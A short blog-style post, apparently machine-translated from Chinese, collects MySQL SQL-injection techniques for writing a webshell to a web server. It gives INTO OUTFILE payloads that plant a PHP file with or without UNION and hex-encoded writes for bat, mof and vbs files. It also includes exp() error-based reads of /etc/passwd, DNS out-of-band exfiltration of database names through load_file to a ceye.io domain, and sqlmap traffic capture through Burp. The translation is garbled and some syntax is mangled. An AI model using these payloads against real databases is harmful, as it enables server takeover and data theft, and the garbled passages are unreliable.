MySQL Writing Shell tips

Today finally with the help of cousin solved the file import/out of the problem. (a matter of course), and then the most recent articles have been tested by themselves, by the way, the record. 1.Mysql database supports union when writing file tips: With the regular union write, you can see that the previous field placeholder will also be written, replacing it with NULL is the same result, this is not a big deal to write the shell, But if it's going to be a problem writing bat,mof,vbs and so on, then how do you get rid of it and just write what we need? It's good to use hex code. Write what we want to write using hex code in segments written on each field, so that we can write only what we need. 2. When the Union is not supported write, many people do not know this method, thought to write content must support union, see an article, can not need to support this method. Syntax: SELECT * from admin where id=1 to outfile ' F:\WWW\phpinfo.php ' fields terminated by ' <? Phpinfo ();?> '%23 Can see the successful write, but this method has a disadvantage is that the query data must be greater than or equal to more than 2 to write content, the number of written content = queried data-1 As you can see, the write fails when we make the previous data error. Look at the situation in Sqlmap: It is obvious to see that this method is also written in Sqlmap. (Burp Fetch SQLMAP packet: Add--proxy "http://127.0.0.1:8080/" in Burp can see the request) Of course, you can see that the file is also written through the regular union. Also attach a function exp (). Through this function can also read the file, but the write file can only write a file content of 0, here must be combined with other exploits, such as: file coverage and so on. Read the file: Select exp (~ (Select*from (select Load_file ('/etc/passwd '))); Write file: Select exp (~ (select*from (select ' Hello ') a)) into outfile ' c:/out.txt '; But only one 0 can be written in. 3. About using DNS parsing to make the blinds easier. First look at the Load_file () function, which can be used to send a DNS resolution request. Then use a similar statement: Select ID from admin where id=1 and if ((Select Load_file (concat (' \\\\ ', (select Database ()), '. Ceye.io\\abc '))) , 1, 1); The database () can be successfully resolved to the DNS front of the domain name. The premise is to support the Read file permissions, this in the actual combat accounted for the column is about 30 or so. There is also the command execution also supported, such as: The truth is similar in combat. Where there may be a command execution, the ping+ domain name may be checked to see if it is executed. Originally wrote the word as a record to store, by the way and share the next. Related information: https://ricterz.me/posts/%E7%AC% ... Injection%20attacks Https://bbs.ichunqiu.com/thread-22002-1-1.html http://lu4n.com/mysql-sqli-write-webshell-two-methods/

---restore content ends---

MySQL Writing Shell tips